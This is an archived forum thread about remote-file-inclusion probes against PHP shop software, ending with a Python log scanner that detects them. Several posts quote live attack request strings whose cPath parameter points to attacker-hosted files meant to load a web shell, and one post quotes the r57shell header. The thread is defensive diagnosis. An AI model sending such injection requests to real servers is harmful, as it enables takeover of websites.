This topic is now archived and is closed to further replies.

rkoechel2004

Strange Site showing up in who's online..

8 posts in this topic

The last couple of days I've noticed in my who's online page that the following site is showing up sometimes. Any idea what this is or why it's happening?

 

/product_info.php?cPath=http://amyru.h18.ru/images/cs.txt?

 

Thanks

Ryan

I'm also getting this url appended to the cPath: http://rumusic.chat.ru/rumusic.wav?

I got the following ones:

http://amygirl.chat.ru/images/image.txt?

http://ninaru.hut2.ru/images/cs.txt?

http://amyru.h18.ru/images/cs.txt?

etc

 

Is it a hacking attempt?

 

We are using 6.15, is our site safe?

 

Any help is appreciated, thanks!

 

David

anybeads.com

 

I saw this one today: http://kiopmanminsuion.chat.ru/http?

 

Does anyone have an idea where this is coming from?


Hello rkoechel2004,

What you are seeing is injection code in your site.

Injection is when hackers inject this type of info into a site whose server is not secure.

On my servers I see this type of attack every minute, but we do a really good job of blocking them. I would suggest that you ask your hosting provider to install a really good firewall system, as it seems to lack one.

The worst is that if they have managed to install this injection, they could install a zombie script as well.

I'm seeing the same thing. Check out this thread: http://forums.creloaded.com/Forums/viewtopic/p=91071.html

Check your site for this file: dir.php

This is what he downloads!

<?php
/******************************************************************************************************/
/*
/* [ASCII-art picture of a spider; layout lost]
/*
/* r57shell.php - a PHP script that lets you execute system commands on the server through the browser
/* You can download the new version on our site: http://rst.void.ru
/* Version: 1.3 (05.03.2006)

 

This for some reason does not display right - it's a picture of a spider.

 

This hacker is hitting all PHP apps looking for security holes.

If you don't have the latest version, which I assume blocks this type of hacker attack, then you may have been hacked.

Firewalls do not stop this type of attack since it's a software security problem.

Firewalls prevent port access and not software execution.

The newest version of PHP is helpful in preventing this type of thing.

ModSecurity, which is installed on a server, is very good at stopping many such types of attacks, but rules need to be added to keep up with the newest attack method.

The way the hacker gets in is by passing the text file to your server - cs.txt

This happens due to poor coding methods that do not prevent this type of thing.

When a URL of this type is passed, the app accepts it and the server copies the cs.txt file to the tmp directory.

He then may download other files to your server in this same manner.

Again, if you suspect you have been hacked, then look around for files that do not belong to you.

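One way to check a web server access log for the requests reported in this thread, as an added example that is not part of any post or of the shop software: it flags every request in which a query parameter such as cPath carries a remote URL. The combined log format, the function name, the sample lines, the client addresses and host.example.invalid are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed input: Apache/nginx "combined" access-log lines.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# A parameter value that starts with a remote scheme after URL-decoding.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines; only the first probe URL is taken from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2006:10:00:01 +0000] '
    '"GET /product_info.php?cPath=1_23&products_id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2006:10:00:05 +0000] '
    '"GET /product_info.php?cPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 4980 "-" "-"',
    '198.51.100.7 - - [10/Mar/2006:10:00:09 +0000] '
    '"GET /index.php?cPath=http%3A%2F%2Fhost.example.invalid%2Fx.txt%3F HTTP/1.1" 404 312 "-" "-"',
]

def find_remote_url_params(lines):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({"client": client, "path": parts.path, "param": name,
                             "remote": value, "status": int(status)})
    return hits

if __name__ == "__main__":
    for hit in find_remote_url_params(SAMPLE_LOG):
        # A 200 only means the page was served, not that the file was included.
        print(hit)
```

The records show which scripts and parameters were probed and from which client, which narrows down where to look for files that do not belong to you. Parameters that legitimately hold a URL (a redirect target, for instance) will be flagged too and need to be reviewed by hand.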